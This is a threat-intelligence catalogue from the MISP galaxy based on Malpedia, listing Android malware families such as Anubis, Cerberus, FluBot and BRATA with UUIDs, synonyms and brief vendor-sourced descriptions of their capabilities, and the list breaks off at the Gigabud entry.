Malpedia

Malware galaxy cluster based on Malpedia.

Authors

Authors and/or Contributors
Davide Arcuri
Alexandre Dulaunoy
Steffen Enders
Andrea Garavaglia
Andras Iklody
Daniel Plohmann
Christophe Vandeplas

FastCash

Internal MISP references

UUID e8a04177-6a91-46a6-9f63-6a9fac4dfa02 which can be used as unique global reference for FastCash in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

888 RAT

Internal MISP references

UUID e98ae895-0831-4e10-aad1-593d1c678db1 which can be used as unique global reference for 888 RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Aberebot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aberebot.

Known Synonyms
`Escobar`

Internal MISP references

UUID 4b9c0228-2bfd-4bc7-bd64-8357a2da12ee which can be used as unique global reference for Aberebot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AbstractEmu

According to PCrisk, AbstractEmu is the name of rooting malware that can gain privileged access to the Android operating system. Threat actors behind AbstractEmu are using legitimate-looking apps (like password managers, app launchers, data savers) to trick users into downloading and opening/executing this malware.

Internal MISP references

UUID 57a4c8c0-140a-45e3-9166-64e3e35c5986 which can be used as unique global reference for AbstractEmu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ActionSpy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ActionSpy.

Known Synonyms
`AxeSpy`

Internal MISP references

UUID 5c7a35bf-e5f1-4b07-b93a-c3608cc9142e which can be used as unique global reference for ActionSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AdoBot

Internal MISP references

UUID d95708e9-220a-428c-b126-a63986099892 which can be used as unique global reference for AdoBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AdultSwine

Internal MISP references

UUID 824f284b-b38b-4a57-9e4a-aee4061a5b2d which can be used as unique global reference for AdultSwine in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Agent Smith

Internal MISP references

UUID 34770e6e-e2c3-4e45-aa86-9d74b5309773 which can be used as unique global reference for Agent Smith in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AhMyth

According to PCrisk, Ahmyth is a Remote Access Trojan (RAT) targeting Android users. It is distributed via trojanized (fake) applications. Ahmyth RAT steals cryptocurrency and banking credentials, 2FA codes, lock screen passcodes, and captures screenshots.

Internal MISP references

UUID 86a5bb47-ac59-449a-8ff2-ae46e19cc6d2 which can be used as unique global reference for AhMyth in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Alien

According to ThreatFabric, this is a fork of Cerberus v1 (active January 2020+). Alien is a rented banking trojan that can remotely control a phone and achieves RAT functionality by abusing TeamViewer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alien.

Known Synonyms
`AlienBot`

Internal MISP references

UUID de483b10-4247-46b3-8ab5-77d089f0145c which can be used as unique global reference for Alien in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AmexTroll

Internal MISP references

UUID 6b153952-9415-4710-8175-354b59252dbc which can be used as unique global reference for AmexTroll in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AmpleBot

This malware was initially named BlackRock and later renamed to AmpleBot.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AmpleBot.

Known Synonyms
`BlackRock`

Internal MISP references

UUID 2f3f82f6-ec21-489e-8257-0967c567798a which can be used as unique global reference for AmpleBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Anatsa

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anatsa.

Known Synonyms
`ReBot`
`TeaBot`
`Toddler`

Internal MISP references

UUID 147081b9-7e59-4613-ad55-bbc08141fee1 which can be used as unique global reference for Anatsa in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AndroRAT

Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.

Internal MISP references

UUID 80447111-8085-40a4-a052-420926091ac6 which can be used as unique global reference for AndroRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ANDROSNATCH

According to Google, a Chrome cookie stealer.

Internal MISP references

UUID 8cd795ed-3a4d-41a3-abb1-0c3dd3aa4eab which can be used as unique global reference for ANDROSNATCH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Anubis (Android)

BleepingComputer found that Anubis will display fake phishing login forms when users open up apps for targeted platforms to steal credentials. This overlay screen will be shown over the real app's login screen to make victims think it's a legitimate login form when in reality, inputted credentials are sent to the attackers.

In the new version spotted by Lookout, Anubis now targets 394 apps and has the following capabilities:

Recording screen activity and sound from the microphone Implementing a SOCKS5 proxy for covert communication and package delivery Capturing screenshots Sending mass SMS messages from the device to specified recipients Retrieving contacts stored on the device Sending, reading, deleting, and blocking notifications for SMS messages received by the device Scanning the device for files of interest to exfiltrate Locking the device screen and displaying a persistent ransom note Submitting USSD code requests to query bank balances Capturing GPS data and pedometer statistics Implementing a keylogger to steal credentials Monitoring active apps to mimic and perform overlay attacks Stopping malicious functionality and removing the malware from the device

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anubis (Android).

Known Synonyms
`BankBot`
`android.bankbot`
`android.bankspy`

Internal MISP references

UUID 85975621-5126-40cb-8083-55cbfa75121b which can be used as unique global reference for Anubis (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AnubisSpy

Internal MISP references

UUID 06ffb614-33ca-4b04-bf3b-623e68754184 which can be used as unique global reference for AnubisSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Asacub

Internal MISP references

UUID dffa06ec-e94f-4fd7-8578-2a98aace5473 which can be used as unique global reference for Asacub in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ashas

Internal MISP references

UUID aabcfbb6-6385-486d-a30b-e3a2edcf493d which can be used as unique global reference for Ashas in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ATANK

According to Lukas Stefanko, this is an open-source crypto-ransomware found on Github in 2018. IT can en/decrypt files (AES, key: 32 random chars, sent to C&C), uses email as contact point but will remove all files after 24 hours or after a reboot.

Internal MISP references

UUID 231f9f49-6752-49af-9ee0-7774578fcbe4 which can be used as unique global reference for ATANK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AxBanker

According to EnigmaSoft, AxBanker is a banking Trojan targeting Android devices specifically. The threatening tool has been deployed as part of large attack campaigns against users in India. The threat actors use smishing (SMS phishing) techniques to smuggle the malware threat onto the victims' devices. The fake applications carrying AxBanker are designed to visually impersonate the official applications of popular Indian banking organizations. The weaponized applications use fake promises or rewards and discounts as additional lures.

Internal MISP references

UUID 4a854e8c-d6ad-4997-8931-b27e39b7f7fa which can be used as unique global reference for AxBanker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

badbazaar

BadBazaar is a type of malware primarily functioning as a banking Trojan. Designed to compromise Android devices, it is often distributed through malicious apps downloaded from unofficial app stores or third-party websites. Once installed, BadBazaar seeks to steal financial information and login credentials by intercepting SMS messages, performing screen recordings, and logging keystrokes on the device. Additionally, it can execute remote commands and download and install other malicious applications, further compromising the security of the affected device.

Internal MISP references

UUID 80b30290-40d3-4ce3-a878-2e0af4b107d8 which can be used as unique global reference for badbazaar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BADCALL (Android)

remote access tool (RAT) payload on Android devices

Internal MISP references

UUID 5eec00de-5d81-4907-817d-f99cb33d9b66 which can be used as unique global reference for BADCALL (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BadPatch

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BadPatch.

Known Synonyms
`WelcomeChat`

Internal MISP references

UUID 9b96e274-1602-48a4-8e0d-9f756d4e835b which can be used as unique global reference for BadPatch in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bahamut (Android)

According to PCrisk, Bahamut is the name of Android malware with spyware functionality. Threat actors use Bahamut to steal sensitive information. The newest malware version targets various messaging apps and personally identifiable information.

Internal MISP references

UUID 4038c3bc-b559-45bb-bac1-9665a54dedf9 which can be used as unique global reference for Bahamut (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Basbanke

Internal MISP references

UUID c59b65d6-d363-4b19-b082-d72508e782c0 which can be used as unique global reference for Basbanke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BianLian (Android)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BianLian (Android).

Known Synonyms
`Hydra`

Internal MISP references

UUID 1faaa5c5-ab4e-4101-b2d9-0e12207d70fc which can be used as unique global reference for BianLian (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BingoMod

Internal MISP references

UUID 2778f61a-48e4-4585-8eff-983d5a4fd6ac which can be used as unique global reference for BingoMod in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlankBot

Internal MISP references

UUID c4a42580-bc5e-4185-adfd-cc6ade9b8424 which can be used as unique global reference for BlankBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BrasDex

According to PCrisk, BraDex is a banking malware targeting Android operating systems. This malicious program aims to gain access to victims' bank accounts and make fraudulent transactions.

At the time of writing, BrasDex targets Brazilian banking applications exclusively. In previous BrasDex campaigns, it infiltrated devices under the guise of Android system related apps. Lately, this malware has been installed by a fake Brazilian Banco Santander banking application.

Internal MISP references

UUID dc5408e9-e9e8-44fd-ac5c-231483d0ebe3 which can be used as unique global reference for BrasDex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BRATA

According to Cleafy, the victim's Android device is factory reset after the attackers siphon money from the victim's bank account. This distracts users from the crime, while removing traces or footprints that might be of interest to forensic analysts.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRATA.

Known Synonyms
`AmexTroll`
`Copybara`

Internal MISP references

UUID d9ff080d-cde0-48da-89db-53435c99446b which can be used as unique global reference for BRATA in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Brunhilda

PRODAFT describes Brunhilda as a "Dropper as a Service" for Google Play, delivering e.g. Alien.

Internal MISP references

UUID 5d3d5f52-0a55-4c81-af87-7809ce43906b which can be used as unique global reference for Brunhilda in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BusyGasper

Internal MISP references

UUID 4bf68bf8-08e5-46f3-ade5-0bd4f124b168 which can be used as unique global reference for BusyGasper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CapraRAT

According to PCrisk, CapraRAT is the name of an Android remote access trojan (RAT), possibly a modified version of another (open-source) RAT called AndroRAT. It is known that CapraRAT is used by an advanced persistent threat group (ATP) called APT36 (also known as Earth Karkaddan). CapraRAT allows attackers to perform certain actions on the infected Android device.

Internal MISP references

UUID 7cd1c5f3-7635-46d2-87f1-e638fb8d714c which can be used as unique global reference for CapraRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CarbonSteal

Internal MISP references

UUID 56090c0b-2b9b-4624-8eff-ef6d3632fd2b which can be used as unique global reference for CarbonSteal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Catelites

Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim. The distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered. Currently the malware has overlays for over 2,200 apps of banks and financial institutions.

Internal MISP references

UUID 2c672b27-bc65-48ba-ba3d-6318473e78b6 which can be used as unique global reference for Catelites in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cerberus

According to PCrisk, Cerberus is an Android banking Trojan which can be rented on hacker forums. It was been created in 2019 and is used to steal sensitive, confidential information. Cerberus can also be used to send commands to users' devices and perform dangerous actions.

Internal MISP references

UUID c3a2448f-bb41-4201-b524-3ddcb02ddbf4 which can be used as unique global reference for Cerberus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chameleon

The malware chamaleon is an Android trojan that pretends to be legitimate entities to steal data from users in Australia and Poland. It exploits the Accessibility Service to monitor and modify the device screen.

Internal MISP references

UUID 90b3a256-311d-416b-b333-e02b910ba75d which can be used as unique global reference for Chameleon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chamois

Internal MISP references

UUID 2e230ff8-3971-4168-a966-176316cbdbf2 which can be used as unique global reference for Chamois in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Charger

Internal MISP references

UUID 6e0545df-8df6-4990-971c-e96c4c60d561 which can be used as unique global reference for Charger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chinotto (Android)

Internal MISP references

UUID 6cc7b402-21cf-4510-be7d-d7f811a57bc1 which can be used as unique global reference for Chinotto (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chrysaor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chrysaor.

Known Synonyms
`JigglyPuff`
`Pegasus`

Internal MISP references

UUID 52acea22-7d88-433c-99e6-8fef1657e3ad which can be used as unique global reference for Chrysaor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Clientor

Internal MISP references

UUID c0a48ca3-682d-45bc-805c-e62aecd4c724 which can be used as unique global reference for Clientor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Clipper

Internal MISP references

UUID ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e which can be used as unique global reference for Clipper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CloudAtlas

Internal MISP references

UUID ed780667-b67c-4e17-ab43-db1b7e018e66 which can be used as unique global reference for CloudAtlas in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CometBot

Internal MISP references

UUID 151bf399-aa8f-4160-b9b5-8fe222f2a6b1 which can be used as unique global reference for CometBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Connic

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Connic.

Known Synonyms
`SpyBanker`

Internal MISP references

UUID 93b1c63a-4a34-44fd-805b-0a3470ff7e6a which can be used as unique global reference for Connic in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Coper

Coper is a descendant of ExoBotCompat, which was a rewritten version of Exobot. Malicious Coper apps have a modular architecture and a multi-stage infection mechanism. Coper has originally been spotted in Colombia but has since emerged in Europa as well.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Coper.

Known Synonyms
`ExobotCompact`
`Octo`

Internal MISP references

UUID 70973ef7-e031-468f-9420-d8aa4eb7543a which can be used as unique global reference for Coper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Copybara

Internal MISP references

UUID e3d07fda-d29d-42e4-a0d6-5827b2d14d17 which can be used as unique global reference for Copybara in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Coronavirus Android Worm

Poses as an app that can offer a "corona safety mask" but phone's address book and sends sms to contacts, spreading its own download link.

Internal MISP references

UUID f041032e-01af-4e66-9fb2-f8da88a6ea35 which can be used as unique global reference for Coronavirus Android Worm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cpuminer (Android)

Internal MISP references

UUID 8a42a699-1746-498b-a558-e7113bb916c0 which can be used as unique global reference for Cpuminer (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CraxsRAT

Internal MISP references

UUID 1f7a8a57-f3e2-4e4b-a4d7-8eb0ba9243c5 which can be used as unique global reference for CraxsRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryCryptor

According to NHS Digital, CryCryptor is distributed via websites that spoof health organisations. At the time of publication these websites have affected the Canadian health service. CryCryptor cannot be obtained from the Google Play store, so devices restricted to only running apps from the store are not affected.

When CryCryptor is run it encrypts common file types and saves a ransom note to every directory where files have been encrypted. Encrypted files have the extension '.enc' appended to the filenames. Additional files are saved containing the salt values used in each encryption and an initialisation vector. These files have the extensions '.enc.salt' and '.enc.iv' respectively.

When files have been encrypted, a notification is displayed directing users to open the ransom note.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryCryptor.

Known Synonyms
`CryCrypter`
`CryDroid`

Internal MISP references

UUID 21e9d7e6-6e8c-49e4-8869-6bac249cda8a which can be used as unique global reference for CryCryptor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CyberAzov

Internal MISP references

UUID bb1821f9-eace-4e63-b55d-fc7821a6e5f1 which can be used as unique global reference for CyberAzov in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DAAM

According to PCrisk, DAAM is an Android malware utilized to gain unauthorized access to targeted devices since 2021. With the DAAM Android botnet, threat actors can bind harmful code with a genuine application using its APK binding service.

Lookout refers to this malware as BouldSpy and assesses with medium confidence that this Android surveillance tool is used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DAAM.

Known Synonyms
`BouldSpy`

Internal MISP references

UUID 37a3b62e-99da-47d7-81fb-78f745427b16 which can be used as unique global reference for DAAM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dark Shades

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark Shades.

Known Synonyms
`Rogue`

Internal MISP references

UUID 97fe35c9-f50c-495f-8736-0ecd95c70192 which can be used as unique global reference for Dark Shades in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DawDropper

Internal MISP references

UUID bd9756da-220d-48d6-a4f5-6646558c4b30 which can be used as unique global reference for DawDropper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DEFENSOR ID

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEFENSOR ID.

Known Synonyms
`Defensor Digital`

Internal MISP references

UUID 76346e4d-d14e-467b-9409-82b28a4d6cd6 which can be used as unique global reference for DEFENSOR ID in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dendroid

Internal MISP references

UUID 89989df2-e8bc-4074-a8a2-130a15d6625f which can be used as unique global reference for Dendroid in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

dmsSpy

Internal MISP references

UUID 72a25832-4bf4-4505-a77d-8c0fc52dc85d which can be used as unique global reference for dmsSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoubleAgent

Internal MISP references

UUID 73fd1bda-e4aa-4777-a628-07580bc070f4 which can be used as unique global reference for DoubleAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoubleLocker

Internal MISP references

UUID 10d0115a-00b4-414e-972b-8320a2bb873c which can be used as unique global reference for DoubleLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dracarys

Android malware that impersonates genuine applications such as Signal, Telegram, WhatsApp, YouTube, and other chat applications and distributes through phishing sites.

Internal MISP references

UUID bf94eee6-2274-40f4-b181-2b49ce6ef9fb which can be used as unique global reference for Dracarys in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DragonEgg

Android variant of ios.LightSpy.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DragonEgg.

Known Synonyms
`LightSpy`

Internal MISP references

UUID 4ef28f14-17f4-4f87-a292-e63b42027c8c which can be used as unique global reference for DragonEgg in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DroidJack

Internal MISP references

UUID 8990cec7-ddd8-435e-97d6-5b36778e86fe which can be used as unique global reference for DroidJack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DroidWatcher

Internal MISP references

UUID 15f3e50b-9fa5-4eab-ac2b-928e9ce03b72 which can be used as unique global reference for DroidWatcher in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DualToy (Android)

Internal MISP references

UUID 8269e779-db23-4c94-aafb-36ee94879417 which can be used as unique global reference for DualToy (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dvmap

Internal MISP references

UUID e5de818e-d25d-47a8-ab31-55fc992bf91b which can be used as unique global reference for Dvmap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Elibomi

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Elibomi.

Known Synonyms
`Drinik`

Internal MISP references

UUID 63cc0b01-c92e-40e7-8669-48d10a490ffb which can be used as unique global reference for Elibomi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ERMAC

According to Intel471, ERMAC, an Android banking trojan enables bad actors to determine when certain apps are launched and then overwrites the screen display to steal the user's credentials

Internal MISP references

UUID 602944f4-a86c-4a05-b98f-cfb525fb8896 which can be used as unique global reference for ERMAC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ErrorFather

ErrorFather is an Android banking trojan with a multi-stage dropper. The final payload is derived from the Cerberus source code leak.

Internal MISP references

UUID 2c7f6a97-4469-4f97-9a69-5549282a94a6 which can be used as unique global reference for ErrorFather in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Eventbot

According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.

Internal MISP references

UUID 5a6fb8cd-d582-4c8c-b7e0-a5b4cf4f248f which can be used as unique global reference for Eventbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ExoBot

Internal MISP references

UUID c9f2b058-6c22-462a-a20a-fca933a597dd which can be used as unique global reference for ExoBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Exodus

Internal MISP references

UUID 462bc006-b7bd-4e10-afdb-52baf86121e8 which can be used as unique global reference for Exodus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FaceStealer

Facebook Credential Stealer.

Internal MISP references

UUID c35ebd96-d2f8-4add-b86f-f552ed5dfa9b which can be used as unique global reference for FaceStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FakeAdBlocker

Internal MISP references

UUID d0ae2b6b-5137-4b64-be3e-4bbc9aa007a6 which can be used as unique global reference for FakeAdBlocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fakecalls

According to Kaspersky, Fakecalls is a Trojan that masquerades as a banking app and imitates phone conversations with bank employees.

Internal MISP references

UUID 014aeab6-2292-4ee5-83d6-fffb0fc21423 which can be used as unique global reference for Fakecalls in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FakeDefend

Internal MISP references

UUID 8ea1fc8c-ec66-4d39-b32a-da69d3277da4 which can be used as unique global reference for FakeDefend in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FakeSpy

Internal MISP references

UUID dd821edd-901b-4a5e-b35f-35bb811964ab which can be used as unique global reference for FakeSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FakeGram

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FakeGram.

Known Synonyms
`FakeTGram`

Internal MISP references

UUID 6c0fc7e4-4629-494f-b471-f7a8cc47c0e0 which can be used as unique global reference for FakeGram in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FastFire

Internal MISP references

UUID 5613da3a-06f5-4363-b468-0b8a03ffc292 which can be used as unique global reference for FastFire in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FastSpy

Internal MISP references

UUID a5e3e217-3790-4d7c-b67a-906b9ee69034 which can be used as unique global reference for FastSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FileCoder

According to heimdal, A new strain of ransomware emerged on Android mobile devices. It targets those who are running the operating system Android 5.1 and higher. This Android ransomware strain has been dubbed by security researchers FileCoder (Android/Filecoder.c) and it spreads via text messages containing a malicious link.

Internal MISP references

UUID 09ff3520-b643-44bd-a0de-90c0e75ba12f which can be used as unique global reference for FileCoder in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FinFisher (Android)

Internal MISP references

UUID 0bf7acd4-6493-4126-9598-d2ed069e32eb which can be used as unique global reference for FinFisher (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlexiSpy (Android)

Internal MISP references

UUID 4305d59a-0d07-4021-a902-e7996378898b which can be used as unique global reference for FlexiSpy (Android) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlexNet

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlexNet.

Known Synonyms
`gugi`

Internal MISP references

UUID 80d7d229-b3a7-4205-8304-f7b18bda129f which can be used as unique global reference for FlexNet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FluBot

PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for it's C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March of 2021, the campaign has only intensified since.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FluBot.

Known Synonyms
`Cabassous`
`FakeChat`

Internal MISP references

UUID ef91833f-3334-4955-9218-f106494e9fc0 which can be used as unique global reference for FluBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FluHorse

According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.

Internal MISP references

UUID aeaeb8b2-650e-471d-a901-3c4fbae42854 which can be used as unique global reference for FluHorse in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlyTrap

Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, 3rd party app stores and sideloading.

Internal MISP references

UUID 24af5bcc-d4bd-42dd-aed4-f994b30b4921 which can be used as unique global reference for FlyTrap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FunkyBot

Internal MISP references

UUID bc0d37fa-113a-45ba-8a1c-b9d818e31f27 which can be used as unique global reference for FunkyBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FurBall

According to Check Point, they uncovered an operation dubbed "Domestic Kitten", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.

Internal MISP references

UUID 53282cc8-fefc-47d7-b6a5-a82a05a88f2a which can be used as unique global reference for FurBall in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Geost

Internal MISP references

UUID b9639878-733c-4f30-9a13-4680a7e17415 which can be used as unique global reference for Geost in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ghimob

Internal MISP references

UUID 3d1f2591-05fe-42f4-aaf8-ed1428f17605 which can be used as unique global reference for Ghimob in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GhostCtrl

Internal MISP references

UUID 3b6c1771-6d20-4177-8be0-12116e254bf5 which can be used as unique global reference for GhostCtrl in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gigabud

Gigabud is the name of an Android Remote Access Trojan (RAT) Android that can record the victim's screen and steal banking credentials by abusing the Accessibility Service. Gigabud masquerades as banking, shopping, and other applications. Threat actors have been observed using deceptive websites to distribute Gigabud RAT.

Internal MISP references

